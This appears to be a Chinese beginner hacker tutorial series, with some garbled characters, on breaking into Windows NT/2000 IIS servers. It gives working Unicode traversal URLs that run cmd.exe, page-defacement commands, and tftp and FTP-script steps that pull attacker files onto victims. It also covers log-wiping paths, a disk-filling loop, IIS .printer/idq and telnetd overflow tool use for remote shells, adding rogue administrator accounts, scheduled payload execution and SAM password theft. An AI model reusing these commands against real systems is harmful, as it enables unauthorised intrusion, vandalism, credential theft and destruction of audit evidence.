菜鳥(niǎo)XXX客快速入門（強(qiáng)烈推薦）

第一節(jié)，伸展運(yùn)動(dòng)。這節(jié)操我們要準(zhǔn)備道具，俗話說(shuō)：“工欲善其事，必先利其器”（是這樣嗎？哎！文化低……）說(shuō)得有道理，我們要學(xué)習(xí)黑客技術(shù)，一點(diǎn)必要的工具必不可少。

1，一臺(tái)屬于自己的可以上網(wǎng)的電腦。這樣你可以有充分的支配權(quán)，上網(wǎng)不用說(shuō)，否則你怎么看到我的文章？wap?呵呵！屬于自己很重要，否則安全性是個(gè)很大的問(wèn)題。第一點(diǎn)相信大家沒(méi)有問(wèn)題。

2，windows2000/nt,別和我說(shuō)98/me,他們是你們同學(xué)用來(lái)玩游戲的�。ó�(dāng)然，我也是鐵桿game fan)對(duì)網(wǎng)絡(luò)支持極差，命令受限制，很多軟件又不能用，對(duì)黑客來(lái)說(shuō)使用起來(lái)絆手絆腳，非常不利。這里我推薦2000，這是一個(gè)很成熟的系統(tǒng)（漏洞還是有一堆）。推薦雙系統(tǒng)，這樣黑玩搭配，干活不累。

3，冰河。中國(guó)第一木馬，中者數(shù)不勝數(shù)，國(guó)人驕傲。雖然用冰河根本不能算黑客，但它確實(shí)能培養(yǎng)你對(duì)黑客的興趣，同時(shí)幫助你了解網(wǎng)絡(luò)，相信很多黑客同學(xué)都是這樣起步的。靜止寫(xiě)的那篇冰河教程很不錯(cuò)，大家仔細(xì)看看。而且，以后你學(xué)會(huì)入侵服務(wù)器后，用冰河操作也會(huì)減少工作量（我是懶蟲(chóng)，爽！）

4，oicq。我們學(xué)黑客，可不是學(xué)泡mm!Anndoo你………… 息怒息怒！我們當(dāng)然是學(xué)黑客，但不要忘了，眾人拾柴火更高，我們通過(guò)net的成員列表，互相聯(lián)系幫助，對(duì)提高水平很有幫助！另外我要廢話一句：據(jù)我了解，現(xiàn)在黑客網(wǎng)站下載 多的都是針對(duì)oicq的破解工具，我個(gè)人認(rèn)為很無(wú)聊，偷個(gè)密碼代表什么，浪費(fèi)時(shí)間！ 后補(bǔ)充：mm不能不泡。（誰(shuí)砸我？？�。。�

5，superscan。很好用的端口掃描器，速度超快，功能一流，一旦擁有，別無(wú)所求……（打�。。┎徽撌钦夷抉R受害者，還是掃服務(wù)器端口，它都非常有效，cshu強(qiáng)烈推薦！

6，一本筆記本/便條，網(wǎng)上資料相當(dāng)多，黑客處理的也是非常之多。良好的習(xí)慣決定了你的效率，準(zhǔn)備一本筆記本，記錄下你的成果，肉雞，木馬利用，命令，密碼……堅(jiān)持一下，你會(huì)發(fā)現(xiàn)你的效率大幅上升的！

7，lc3.著名nt/2000sam破解程序，有時(shí)我們拿不到足夠權(quán)限，又沒(méi)好辦法，那么lc3是 好的解決辦法，只要你拿的到sam，你就是服務(wù)器它爺爺！本站有其破解程序，支持了暴力破解！

8，程序合并。這是玩木馬必需的，雖然木馬是很低的手段，但有時(shí)配合巧辦法（以后我會(huì)介紹）確實(shí)能夠達(dá)到意想不到的效果，朋友們可以在空閑時(shí)玩玩木馬，很有趣，若你能巧妙的騙過(guò)mm,那么webmaster也可能被你騙倒：〉 （比較理想化）

9，流光4for 2000/nt�？赡苁鞘澜缟� 好的綜合類黑軟！中國(guó)的驕傲，它集成了很全的漏洞信息，速度快，方法多，對(duì)有漏洞的主機(jī)是毀滅性的打擊，操作又方便，是快速黑站必不可少的精品工具。超級(jí)吐血推薦�。�

10，良好的心態(tài)，穩(wěn)定的情緒，刻苦鉆研的精神，刨根問(wèn)底的作風(fēng)，打掃房間的習(xí)慣。黑客是門很高深的學(xué)問(wèn)，不要幻想一步登天，失敗是常有的事，千萬(wàn)不可灰心。在那么多黑軟的圍下，切不可完全依賴他們，一定要了解它們利用什么原理工作。對(duì)任何一個(gè)小問(wèn)題，小細(xì)節(jié)，一定要問(wèn)清楚，net就是給大家互相交流的場(chǎng)所哦！黑完后不要得意忘形，打掃戰(zhàn)場(chǎng)也很重要，以防萬(wàn)一。

第一節(jié)操完，可能很無(wú)聊，我就這點(diǎn)水平，大家見(jiàn)諒！這里我說(shuō)一句大話：做完菜鳥(niǎo)操，你會(huì)黑簡(jiǎn)單的站（哎喲！心慌了�。�

下一節(jié)操我們要介紹如何掌握一臺(tái)主機(jī)的基本信息，期待中……

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
真是太對(duì)不起大家了，隔了那么久才寫(xiě)這篇教程，我這幾天實(shí)在太忙，大家還是體諒一下我吧，好了，開(kāi)始做操。

今天的內(nèi)容是獲得主機(jī)的信息。 我們要黑一臺(tái)主機(jī)，首先要了解它的信息，括它的類型，用戶列表，目錄，端口，漏洞等等。

首先我們我們要找一臺(tái)主機(jī)來(lái)練手，隨便挑吧！www.flyingfish.com(亂說(shuō)的)

第一部，呵呵，先在ie里看看吧，mmmm.....做的還行，挺精致的！主要是我們肯定了它現(xiàn)在是正常的。 然后，我們應(yīng)該知道它的ip,很簡(jiǎn)單，ping它一下就可以了。

ping www.flyingfish.com，看看窗口里有了什么？是不是有三行回應(yīng)，其中的111.111.222.222就是ip了（還是胡說(shuō)的，一個(gè)例子）。有人是不是要問(wèn)，我這里怎么沒(méi)有。那可能是兩個(gè)原因，第一，你打錯(cuò)命令了；第二，該主機(jī)裝了防火墻，禁止ping,不過(guò)這種可能很小。

知道了ip，下一步應(yīng)該確定端口了。下面是一些常用的端口的默認(rèn)值

21--ftp 重要哦

23--telnet 歡呼吧

25-smtp 盡管重要，但似乎沒(méi)什么可利用的

53--domain 同上

79--finger 可知道用戶信息了

80--http 要看網(wǎng)頁(yè)，沒(méi)它不行吧

110--pop 收信的

139--netbios 共享用的，很有利用價(jià)值哦

3389--win2000超級(jí)終端 呵呵，這個(gè)好！

其實(shí)端口有上千種，這些 常用

我們?cè)趺粗婪⻊?wù)器有什么端口打開(kāi)呢？？去找個(gè)掃描器吧，x-scan ,super scan,flux等等很多哦。這里我推薦super scan ，速度很快，本站也有其教程哦！用法還是比較傻瓜的，估計(jì)大家不會(huì)有問(wèn)題，輕輕幾點(diǎn)，打開(kāi)的端口就出現(xiàn)了。不錯(cuò)不錯(cuò)，上面說(shuō)到的都有（太理想化了吧!）

那么我們?cè)撊绾螒?yīng)對(duì)呢？

ps:忘了說(shuō)一聲，順便掃一下7626,冰河有也說(shuō)不準(zhǔn)哦：）

若有ftp,那就用用匿名登陸。自己動(dòng)手也行， 好用x-scan flux等吧！反正，有ftp就有一份希望

telnet在！好!telnet 111.111.222.222，出現(xiàn)窗口了吧！嗯？要密碼？看來(lái)網(wǎng)管還不是超級(jí)白癡：）隨便猜個(gè)，錯(cuò)了，閃人！

smtp,看著它，無(wú)奈

domain，一般它帶了局域網(wǎng)了

finger 可以知道用戶列表了，不好，忘了用法了，幸好finger很少出現(xiàn)

80肯定在，我們等會(huì)來(lái)對(duì)付它

110 有smtp，pop在也不奇怪了

139 找個(gè)掃描器來(lái)找找有沒(méi)有露在外面的共享吧，日后也用得著

3389 太太太好了��！打開(kāi)客戶端吧，用輸入法漏洞試試，成了就干了它！不成也沒(méi)事，我們以后完全控制它3389會(huì)很方便的。

端口掃完了！我們?cè)诙嗔私馑稽c(diǎn)吧！追捕大家都知道吧，其實(shí)用它獲取主機(jī)信息也不賴哦。打開(kāi)追捕，輸入ip,選擇智能追捕，是不是有很多信息出來(lái)了？雖然不能直接利用，但畢竟我們有對(duì)它有了進(jìn)一步的了解。

掌握了那么多信息，我們?cè)撟鳇c(diǎn)什么了，一般黑客入侵都是靠著系統(tǒng)漏洞，不會(huì)都傻傻地去暴力破解的。我們現(xiàn)在就要看看它有什么漏洞。

對(duì)漏洞大家可能不太了解，我這里也不能一一說(shuō)明了，太多了，感興趣的話去論壇找freedom吧！

目前廣泛利用和存在的漏洞有：unicode,unicode后續(xù)，iis溢出，.idq,.frontpage extend,輸入法漏洞等等大漏洞。 至于如何確定，呵呵，絕對(duì)不會(huì)是一行一行地在ie中試吧，拿出x-scan吧，很好的掃描器哦！

稍微設(shè)置一下就上路吧！過(guò)了一會(huì)，呵呵，報(bào)告出來(lái)了，快看，哇！漏洞一大堆！這下賺了！各條漏洞都有詳細(xì)的信息，大家看吧，總比我說(shuō)的準(zhǔn)了。

現(xiàn)在這臺(tái)主機(jī)已經(jīng)和我們成為親戚了，要讓這位親愛(ài)的親戚做點(diǎn)事，就要開(kāi)始各種攻擊了，下回我們就探討一下 可愛(ài)的unicode漏洞，各位可能就會(huì)在unicode中完成第一次黑客體驗(yàn)，再見(jiàn)：）

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
今天我們談?wù)剈nicode漏洞，這可是基礎(chǔ)中的基礎(chǔ)，重點(diǎn)里的重點(diǎn)，不懂的一定要好好學(xué)。

2000年10月17日中聯(lián)綠盟發(fā)布了以下的安全公告：

微軟IIS 4.0 / 5.0 擴(kuò)展UNICODE目錄遍歷漏洞

遠(yuǎn)程漏洞：是

本地漏洞：是

發(fā)布日期：2000年10月17日

更新日期：2000年10月17日

受影響的版本：

Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

這可是中國(guó)乃至全球網(wǎng)絡(luò)安全界的一次大變節(jié)，入侵nt/2000系統(tǒng)變得如此簡(jiǎn)單，不打補(bǔ)丁的死路一條。



下面開(kāi)始正式學(xué)習(xí)：

一，UNICODE漏洞的原理

此漏洞從中文IIS4.0+SP6開(kāi)始，還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1， 臺(tái)灣繁體中文也同樣存在這樣的漏洞。

中文版的WIN2000中，UNICODE編碼 存在BUG，在UNICODE 編碼中

%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'

%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'

在NT4中/編碼為%c1%9c

在英文版里： WIN2000英文版%c0%af

在中文win2k里：%c1%1c

此外還有多種編碼，不一一闡述。

本文例子均以win2k為準(zhǔn)，其他類型請(qǐng)自行替換。



二，一切從基礎(chǔ)開(kāi)始

由于winnt/system32/cmd.exe的存在，使遠(yuǎn)程執(zhí)行命令變?yōu)榭赡�，在瀏覽器里輸入以下請(qǐng)求：(假設(shè)11.11.22.22有漏洞）

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

學(xué)過(guò)dos的應(yīng)該可以看懂，其實(shí)就是利用當(dāng)中的非法請(qǐng)求使我們可以連到system32下，如果inetpub/目錄不合winnt同盤，或者目錄級(jí)數(shù)有改動(dòng)，可能會(huì)引起請(qǐng)求失敗。

如果成功，那么在瀏覽區(qū)可看到如下信息：

Directory of C:/inetpub/scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. （假設(shè)目錄中沒(méi)有文件，實(shí)際上有一大堆）

是不是有自己機(jī)器的感覺(jué)了，正點(diǎn)！就是這種感覺(jué)！

cmd.exe相當(dāng)與dos里的command.com，因此，我們可以執(zhí)行很多命令了！

http://11.11.22.22/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir （這個(gè)命令同樣道理）

大家請(qǐng)注意：/c后面的+，實(shí)際上，他就是空格，請(qǐng)記牢！dir開(kāi)始就是dos命令了，我們可以更改一下：

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/autoexec.bat+c:/winnt/auto.exe

會(huì)dos的朋友一定懂其意義了，不懂的請(qǐng)去看書(shū) .

不用說(shuō)，大家也知道我們就可以利用它來(lái)對(duì)有漏洞的機(jī)器展開(kāi)攻擊了！



三，實(shí)戰(zhàn)演練

1，修改主頁(yè)�。ㄊ遣皇呛芩浚�

一般主頁(yè)位置在c:/inetpub/wwwroot下，但要是改了路徑，就需要找找了。

方便的方法：在瀏覽器里輸入 http://11.11.22.22/.ida要是有漏洞，那在瀏覽器里便會(huì)顯示主頁(yè)路徑，這個(gè)漏洞存在率很高，自然是我們的首選。

分析法：用dir看各個(gè)盤符的根目錄，看可疑的就進(jìn)去看，運(yùn)氣好的在一分鐘里找到，這要看運(yùn)氣和直覺(jué)。

dir/s法：首先在看其主頁(yè)，找個(gè)圖片或連接，看它的文件名，比如，11.11.22.22首頁(yè)上有一幅圖片，右擊，屬性，看到了嗎？iloveu.gif，然后我們利用unicode輸入這條命令dir c:/iloveu.gif /s意味著查找c盤下所有目錄里的iloveu.gif，注意實(shí)際應(yīng)用時(shí)別忘了把空格改為+,如果沒(méi)有繼續(xù)找d盤，很快就能確定主頁(yè)目錄的。

找到了目錄，就要對(duì)它開(kāi)刀了！一般默認(rèn)收頁(yè)為index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一個(gè)，現(xiàn)在我們確定11.11.22.22中為index.htm

那么我們就修改它吧！

方便的方法：echo法。echo是一個(gè)系統(tǒng)命令，主要用于設(shè)置回應(yīng)開(kāi)關(guān)，而echo cshu >c:/autoexe.bat就是把cshu加入autoexec.bat里并刪除原有內(nèi)容，echo cshunice >>c:/autoexec.bat就是加入cshunice但不刪除原有內(nèi)容，這樣我們就可以逍遙的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:/inetpub/wwwroot/index.htm

回應(yīng)為：HTTP 500 - 內(nèi)部服務(wù)器錯(cuò)誤

通過(guò)對(duì)cmd的分析，袁哥得出一條簡(jiǎn)便的方法，加入"符號(hào)

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:/inetpub/wwwroot/index.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:/inetpub/wwwroot/index.htm

回應(yīng)為：cgi錯(cuò)誤，不用理會(huì)

兩條命令一下，呵呵，再看看11.11.22.22，是不是烙上我們的大名了？不錯(cuò)吧

而在實(shí)際操作中，可能袁哥的方法也會(huì)失效，這時(shí)，我們就可以copy cmd.exe 為另一個(gè)exe，記住路徑，用copy后的來(lái)echo

例如：11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:/a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:/inetpub/wwwroot/index.htm

2,上傳法：echo有點(diǎn)不講道理，把人家的文件破壞了，要是想在主頁(yè)上增光添彩，那就應(yīng)該用改好的主頁(yè)上傳，這個(gè)我們后面介紹。

幾點(diǎn)忠告：

1，對(duì)于沒(méi)有主頁(yè)的機(jī)器（就是正在建立的主頁(yè)），不要改它，這很沒(méi)水準(zhǔn)，也很沒(méi)道德

2，echo前記得幫他們做好備份

3，不準(zhǔn)在主頁(yè)里加入惡性語(yǔ)句



2，下載文件

要是有什么有用的文件被你發(fā)現(xiàn)，那我們?nèi)绾蜗螺d呢？

簡(jiǎn)單的方法：把文件copy至網(wǎng)頁(yè)目錄下。copy c:/email/baby.eml c:/inetpub/wwwroot/baby.zip,然后，下載11.11.22.22/baby.zip就行了，注意！實(shí)際應(yīng)用中要記得對(duì)文件名進(jìn)行修改，總之不能暴露。

別的方法：對(duì)不起，沒(méi)想好：）



3， 重要的上傳

一般方法：ftp法

首先建一個(gè)ftp腳本文件：c:/hehe.haha（名字亂取把），申請(qǐng)一個(gè)ftp賬號(hào)，然后用echo吧

echo+open ftp.cshu.com（ftp主機(jī)） > c:/hehe.haha

echo+user yourname >> cc:/hehe.haha (yourname是用戶名)

echo+yourpasswd >> c:/hehe.haha (yourpasswd是密碼)

echo+get setup.exe >> c:/hehe.haha 要下載的文件

echo+quit >> c:/hehe.haha

完了以后：ftp+/s:c:/hehe.haha,由于是ftp主機(jī)，那么速度一定很快，過(guò)一會(huì)setup.exe就會(huì)出現(xiàn)在當(dāng)前目錄了（也就是cmd所在目錄）

別忘了先上傳到ftp主機(jī)，不要做馬大哈哦！

簡(jiǎn)單的方法：tftp法。

這種方法不用中轉(zhuǎn)服務(wù)器，首先準(zhǔn)備一個(gè)tftp服務(wù)端，它的作用就是把你的機(jī)器做成一個(gè)tftp服務(wù)器，利用漏洞機(jī)器來(lái)下載（注意，運(yùn)行tftp時(shí)不要運(yùn)行其他的ftp軟件）

在這里我推薦cisco tftp server，自己去找找把，實(shí)在沒(méi)有來(lái)找我：）

安裝好后運(yùn)行，別忘了設(shè)置好默認(rèn)目錄，否則會(huì)找不到文件

tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:/winnt/ihateu.exe（ihateu.exe在默認(rèn)目錄里）

1.2.3.4為你的ip，用unicode運(yùn)行一下，會(huì)看到tftp server里有反應(yīng)了，這就好了，不一會(huì)，文件就傳上去了，方便把！

學(xué)會(huì)了上傳，我們就可以好好改主頁(yè)，還可以上傳木馬，還可以把程序放上去運(yùn)行…………（運(yùn)行程序和在dos里一樣）



4，如何清除痕跡

雖然國(guó)內(nèi)主機(jī)紀(jì)錄ip的不是很多，但萬(wàn)事小心為妙，unicode權(quán)限達(dá)不到admin。用cleaniislog行不通，就…………直接刪吧！

C:/winnt/system32/logfiles/*.*

C:/winnt/ssytem32/config/*.evt

C:/winnt/system32/dtclog/*.*

C:/winnt/system32/*.log

C:/winnt/system32/*.txt

C:/winnt/*.txt

C:/winnt/*.log

全……擦掉！



四，細(xì)節(jié)問(wèn)題。

1，遇到長(zhǎng)文件名怎么辦？

c:/program files/

就用c:/"program20%files"/

2，遇到空格怎么辦？

20%代替嘍，或者xx yy=xxyy~1

3,如何做個(gè)很大的文件？

目的就是破壞啦！我不喜歡不過(guò)教教你們啦

@echo off

echo big > c:/a.a

:h

copy c:/a.a+c:/a.a c:/a.a

goto h

注意不要亂來(lái)啊！

4，輸入命令，沒(méi)反應(yīng)或反應(yīng)不對(duì)。

：）請(qǐng)檢查檢查再檢查命令的正確性，可能沒(méi)有漏洞，那就閃人！看在你看到這里那么給我面子的份上，在給你幾個(gè)吧！

http://www.exsample.com/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir+c :/ 或http://www.exsample.com/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/ 或http://www.exsample.com/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/ 或http://www.exsample.com/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/

不一定有用哦！

5，如何找到unicode漏洞的主機(jī)

呵呵：） 好的方法自然是………………一個(gè)一個(gè)ping,一個(gè)一個(gè)試嘍：）

不要打我呀！我說(shuō)我說(shuō)。 好找一個(gè)cgi掃描器，unicode查找器多如牛毛，隨便找個(gè)吧！

6，我copy，del文件，怎么顯示aceess denined?

這個(gè)不好辦了，由于unicode所擁有的權(quán)限有限，出現(xiàn)上述情況很正常，我們要做的便是提高自己的權(quán)限！

這個(gè)我會(huì)在今后介紹，現(xiàn)在你可以試試attrib

attrib -r -h -s c:/autoexec.bat

再對(duì)autoexec.bat進(jìn)行操作，看看有沒(méi)有效果，成功率不高，不好意思！

7，我黑了主頁(yè)，天下無(wú)敵？

我本來(lái)想對(duì)你說(shuō)：“見(jiàn)你的鬼去吧！”不過(guò)想想不大禮貌，有失我紳士風(fēng)度，所以改個(gè)口

echo主頁(yè)或改主頁(yè)在不懂黑客的人看起來(lái)很了不起，不過(guò)，它 多算是一個(gè)基礎(chǔ)，拿到admin才是我們的終極目標(biāo)！

對(duì)cshu全體成員來(lái)說(shuō)，不準(zhǔn)去改正在建立的網(wǎng)頁(yè)！這是我們的原則！

要是你想耍耍威風(fēng)，那也可以理解，那就去黑外國(guó)的，或者url欺騙也是個(gè)好選擇

8，我如何做更多的事？

第一，努力提高權(quán)限

第二，由于cmd的限制，我們可以做的不多，那就要程序幫忙，上傳吧！切記，要隱秘！
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－


一，frontpage擴(kuò)展攻擊。

為什么把它放第一位呢？原因很簡(jiǎn)單，它 方便，frontpage服務(wù)器擴(kuò)展是一種方便的遠(yuǎn)程站點(diǎn)管理功能，可是由于某些網(wǎng)管白癡的疏忽（為什么白癡滿街飛？）不設(shè)置訪問(wèn)密碼，如果那樣的話，我們只要用一個(gè)frontpage就可以黑它了�。∵@完全不是黑客工具，但它確實(shí)辦到了，還要感謝白癡網(wǎng)管和微軟啊！

具體做法：

1，準(zhǔn)備frontpage，我是用dreamweaver的，但它不能黑啊：） 好是2000版，只是不要是老掉牙的版本就行了。

2，找一臺(tái)有frontpage擴(kuò)展的主機(jī)，可以用流光，也可以用搜索引擎查找/_vti_pvt/，這是frontpage擴(kuò)展的標(biāo)志。

3，接下來(lái)打開(kāi)frontpage,(媽媽：你在干什么？回答：做網(wǎng)頁(yè)！媽媽：好孩子！^_^）文件菜單下選擇“打開(kāi)站點(diǎn)”，然后在文件夾框里寫(xiě)入http://11.11.22.22（我習(xí)慣用這個(gè)做例子，以fp2000為準(zhǔn)）注意http://不要漏掉。在按下“打開(kāi)”按鈕前，不要忘了祈禱：）一兩秒后，出現(xiàn)了文件夾，好�。〕晒α�，現(xiàn)在就可以操作網(wǎng)頁(yè)文件了。

4，萬(wàn)一跳出錯(cuò)誤信息，表示有密碼（這個(gè)不算白癡）這時(shí)我們?cè)囍靡韵聈rl,http://11.11.22.22/_vti_pvt/service.pwd,這是默認(rèn)的密碼文件，下載下來(lái)，應(yīng)該是unix的加密，找個(gè)解密器破密碼吧！運(yùn)氣好的話還可以改網(wǎng)頁(yè)。

我的看法：

這個(gè)漏洞只能說(shuō)明網(wǎng)管的疏忽，對(duì)我們而言是沒(méi)有什么利用價(jià)值的，只可以改改網(wǎng)頁(yè)，也許這也夠了，但要進(jìn)一步控制主機(jī)，此漏洞就無(wú)能為力。消遣時(shí)可以玩玩。

　

二，iis.printer溢出攻擊

據(jù)說(shuō)緩沖區(qū)溢出攻擊是黑客入侵時(shí)70%所選的方法，看起來(lái)有點(diǎn)夸張，但確實(shí)有道理，因?yàn)楸┝γ艽a破解在網(wǎng)絡(luò)上變得非常之慢，而像unicode的解碼漏洞所取得的權(quán)限又太低，而緩沖區(qū)溢出一般可取得system權(quán)限，是非常有用的！

具體原理我也不是很清楚，只能說(shuō)個(gè)大概：當(dāng)我們向系統(tǒng)發(fā)出超出緩沖區(qū)大小的數(shù)據(jù)處理請(qǐng)求時(shí)，便會(huì)引發(fā)溢出，并彈出錯(cuò)誤對(duì)話框，我們�？吹降摹胺欠ú僮鳌逼鋵�(shí)也是可能是由于溢出。而當(dāng)溢出時(shí)，eip發(fā)生錯(cuò)誤，有匯編知識(shí)的朋友應(yīng)該記得，eip是控制執(zhí)行代碼的位置（順便問(wèn)一下，有沒(méi)有會(huì)crack的高人，記得做我老師）這時(shí)加入一段惡性代碼，算好發(fā)生溢出時(shí)的eip值，這樣溢出時(shí)就會(huì)執(zhí)行惡性代碼而不是當(dāng)?shù)�。非法操作我們知道多的不得了，因此……溢出攻�?/a />是非常強(qiáng)大的！

由于匯編對(duì)于我們來(lái)說(shuō)較難掌握，加之對(duì)溢出的了解很有限，那么我們只能借助們的程序來(lái)黑了。

具體方法：

1，準(zhǔn)備iishack，本站有下載，該版本可以對(duì)多種系統(tǒng)進(jìn)行攻擊。

2，用x-scan或流光掃描一個(gè)有iis.printer漏洞的主機(jī)，然后就可以攻擊了。

3，在命令行方式執(zhí)行iis5hack (主機(jī)ip) (端口號(hào)，默認(rèn)80）（系統(tǒng)代號(hào)，具體可參考程序的說(shuō)明） （ shell口）

例如：iis5hack 11.11.22.22 80 1 111(以為在111端口開(kāi)一個(gè)shell)

4,用nc或telnet連上，nc/telnet 11.11.22.22 111,成功的話就可以控制機(jī)器了，加個(gè)用戶，做個(gè)代理……

我的看法：

這算是一個(gè)比較有用的漏洞了，它能幫助我們?nèi)〉胹ystem權(quán)限，其實(shí)和admin差不了多少了，對(duì)于做一臺(tái)跳板是非常有利的，希望大家熟練掌握。



三，idq/ida漏洞溢出攻擊

這是時(shí)下很熱門的了，原理和上面的printer相似，目前我只找到了iis5的攻擊程序，在cshu里也可以找到的，我們準(zhǔn)備的是snake的gui版本，很方便的。

具體方法：

1，準(zhǔn)備snakeiis溢出程序�？梢詮谋菊鞠螺d。

2，ida/idq漏洞很多的，但win2k的服務(wù)器就不是那么普遍了，所以用你熟練的掃描器去找一打win2k的機(jī)器吧。

3，程序的界面是很傻瓜的，把ip填入，選擇好類型，按下溢出按鈕，顯示shellcode發(fā)送完畢。

4，telnet/nc到你設(shè)定好的端口，如果成功的話，會(huì)顯示目錄下的信息（因?yàn)槟J(rèn)shellcode是dir)

5，歡呼吧！再次溢出，別忘了改shellcode為你想要的代碼哦。

6，重復(fù)4，很快一臺(tái)新鮮的win2k被你控制了！

我的看法：

我很喜歡用這種攻擊，因?yàn)閣in2k的3389可以很方便的為我做事，省力地搞到一臺(tái)win2k，然后慢慢享用，爽到根尖細(xì)胞啊！大家應(yīng)該掌握這項(xiàng)方法。



四，*bsd telnetd溢出攻擊

又是溢出，不過(guò)這個(gè)可是真正的熱點(diǎn)哦， 近紅盟等大型安全網(wǎng)站被黑就是因?yàn)檫@個(gè)！所以看看吧

具體方法：

1，使用fbsdhack for win2k來(lái)攻擊，本站有下載的

2，還是要找到這樣的主機(jī)，一般是xnix的，比較少的，用專門的掃描器吧，我會(huì)在不久放出來(lái)。

3，等吧！這個(gè)漏洞要發(fā)送的信息很大，大約16mb,可怕吧，所以 好用高速肉雞

4，有幸成功了，記得請(qǐng)我吃飯！

我的看法：

這個(gè)漏洞的利用比較有難度，從找機(jī)器開(kāi)始就是。但作為黑客愛(ài)好者，我們沒(méi)有理由去回避它！

　

五，密碼暴力破解

這是 原始，也是 基本的攻擊的方式了，利用字典文件或暴力模式，對(duì)密碼進(jìn)行探測(cè)。費(fèi)時(shí)費(fèi)力，但若有經(jīng)驗(yàn)的話，可以縮短這一過(guò)程。

具體方法：

1，找一個(gè)破解器，有ftp,http,smtp,pop3,telnet等等類型。

2，找到一臺(tái)相應(yīng)的主機(jī)。

3，設(shè)定一番，上路吧！你可以睡覺(jué)，可以去machine(就是做作業(yè))，可以去泡妞……就是不要傻等。為什么呢？因?yàn)闀?huì)傷視力的：）怎么倒了一片，起來(lái)起來(lái)！

4，萬(wàn)一成功了（之所以用這個(gè)詞，是因?yàn)槌晒β屎艿偷模┍砻髂氵\(yùn)氣旺，趕緊下線，買彩票去吧^_^
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

大家好，這幾天被cgi程序搞得頭昏腦脹，主要還是51的錯(cuò)，什么破東西，那么多錯(cuò)誤！現(xiàn)在只好暫時(shí)借人家的地方用。

這是菜鳥(niǎo)操的 后第二節(jié)，說(shuō)實(shí)話我還可以寫(xiě)很多的，但是作業(yè)還欠了一大堆：（為什么我沒(méi)有滿舟的狗屎運(yùn)？算了算了，我不合那種欺世盜名之輩一般見(jiàn)識(shí)，開(kāi)始做操吧！

不知道大家對(duì)unicode和溢出攻擊是不是熟練了？沒(méi)有的要加油哦！今天我們來(lái)談?wù)剻?quán)限的提升。

在windows系統(tǒng)中， 高的權(quán)限掌握在administrators的手里，在xnix中稱為root,我們要完全掌握一臺(tái)機(jī)器，拿到admin是不可或缺的。

首先說(shuō)說(shuō) 簡(jiǎn)單的:system to admin

當(dāng)我們用溢出攻擊成功后，其實(shí)我們已經(jīng)拿到了system權(quán)限（具體看每種攻擊而可能有所不同）這時(shí)我們很容易拿到admin權(quán)限。首先看看一下命令：

net user 察看用戶表 net user username pass /add(添加密碼為pass的用戶username)

net localgroup 察看組 net localgroup guests cshu /add 把cshu用戶加入guests組

net use //ip/ipc$ "password" /user:username 這是遠(yuǎn)程連接的命令

假如我們溢出了11.11.22.22，那么這樣做吧！

net user （看到了iusr_machinename的用戶了，它一般沒(méi)什么權(quán)限的）

net user iusr_machinename cshu （把它的密碼設(shè)為cshu）

net localgroup administrators iusr_machinename /add（加入administrators組）

這樣我們就擁有了iusr_machinename這一賬號(hào)，admin權(quán)限，簡(jiǎn)單吧！

熟悉一下net use 命令：

net use //11.11.22.22/ipc$ "cshu" /user:iusr_machinename 建立連接

copy c:/haha.exe //11.11.22.22/admin$ 把haha.exe 復(fù)制到機(jī)器c:/winnt/system32上，若是c$.d$,就表示c,d盤

net time //11.11.22.22 看到了時(shí)間了，比如是8點(diǎn)

at //11.11.22.22 8:03 haha.exe 就會(huì)在8點(diǎn)3分執(zhí)行。

net use //11.11.22.22 /delete 斷開(kāi)連接

應(yīng)該是很簡(jiǎn)單的。這樣我們就可以隨心所欲地操作11.11.22.22了，admin是 高權(quán)限，所以沒(méi)有限制的：）

是不是很簡(jiǎn)單？所以我是溢出是很厲害的攻擊方法。

　

3389知道吧！如果能進(jìn)入，那么用上面的命令也可以輕易拿到admin的，不過(guò)呢，有3389漏洞的機(jī)器已經(jīng)不多了。看你運(yùn)氣了！（本站有幾篇關(guān)于3389的好文章）

　

總的來(lái)說(shuō)，還是unicode的機(jī)器 多，為什么白癡網(wǎng)管不會(huì)滅絕呢：）雖然unicode拿admin有一定難度，但還是要試試的。

首先，我們檢查一下unicode在這臺(tái)機(jī)器上的權(quán)限，一般看讀寫(xiě)權(quán)限和運(yùn)行權(quán)限。用copy 或del命令便可確定讀寫(xiě)權(quán)限，然后上傳文件運(yùn)行一下便可知道運(yùn)行權(quán)限。

1，如果我們可以對(duì)winnt/repair和winnt/config進(jìn)行訪問(wèn)，sam文件就在里面（win2k里是sam，nt4里是sam._）那么用tftp 把get改成put下載下來(lái)，或者把它復(fù)制到inetpub/wwwroot下，改成zip下載。

